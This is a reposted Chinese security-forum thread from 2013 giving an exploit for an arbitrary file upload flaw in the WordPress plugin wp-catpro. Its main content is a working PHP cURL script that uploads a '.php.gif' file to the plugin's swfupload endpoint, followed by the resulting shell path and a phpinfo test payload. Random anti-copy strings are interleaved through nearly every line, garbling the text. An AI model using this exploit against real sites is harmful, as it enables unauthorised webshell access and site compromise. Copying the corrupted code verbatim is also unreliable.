找回密码
 立即注册
查看: 3066|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability$ J5 c0 i* J! @5 u
#-----------------------------------------------------------------------
" d$ t( q6 @; v! o5 E
; U$ S) R; ~4 t, V- T% ]作者  => Zikou-16" e7 P7 N9 P& s6 [3 m8 M. m
邮箱 => zikou16x@gmail.com) c% N1 x' A4 ^0 b
测试系统 : Windows 7 , Backtrack 5r3
5 j" z  u" C! L8 w/ D- c8 v下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
+ S3 D; l( g$ z" r, H####  D8 \6 m: P' w( n
- h0 g, |: i9 L% m/ N% y2 }
#=> Exploit 信息:2 X9 c4 [# P1 [
------------------
; I6 M2 C; r0 T  S5 Y3 i; K# 攻击者可以上传 file/shell.php.gif
3 z$ x9 K0 d) o# k4 l% c% }' \# ("jpg", "gif", "png")  // Allowed file extensions
( b- @# l- `! x7 S# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
1 A0 ~4 f6 Q/ R( E' @# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)9 o1 G, Z2 [8 m" H) M& D6 G& M
------------------4 a, K$ W- i/ E
5 W7 x- a1 R4 U0 m0 s
#=> Exploit
3 W4 L* w; |* _* c-----------8 H: e# \" v! f& B! R" J
<?php
7 \7 O1 c% E; F$ `1 }
9 C" c/ x; n( a2 W$uploadfile="zik.php.gif";
9 J' r3 T. x/ }" U* h$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
9 i. |" V; {& ]1 m; u+ d% Mcurl_setopt($ch, CURLOPT_POST, true);
- X1 N8 N4 O: O1 M' Dcurl_setopt($ch, CURLOPT_POSTFIELDS,
( v% ]/ r4 W5 C! D  E9 ^array('Filedata'=>"@$uploadfile",, W6 S+ E& a: E- I# L
'folder'=>'/wp-content/uploads/catpro/'));" w( \, N' A* I- s0 g
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);! T: L4 Z( A) p- g; d
$postResult = curl_exec($ch);: J' a- _( d- A$ {& S  A1 u4 R
curl_close($ch);2 B8 ^; G9 g/ S- s; K
) i5 e9 _, Y* r$ U$ H* O
print "$postResult";* S6 N2 e4 ?9 E

" t8 T3 _, u, c1 P- v- `- @Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif* T0 M) w& Y& l% n: D1 Q
  ?>
9 a; n% q' E/ W) v6 e4 H! n3 G<?php
5 F! `6 l0 s0 g' H& Yphpinfo();
3 r, o& r% Y& K) U5 L?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表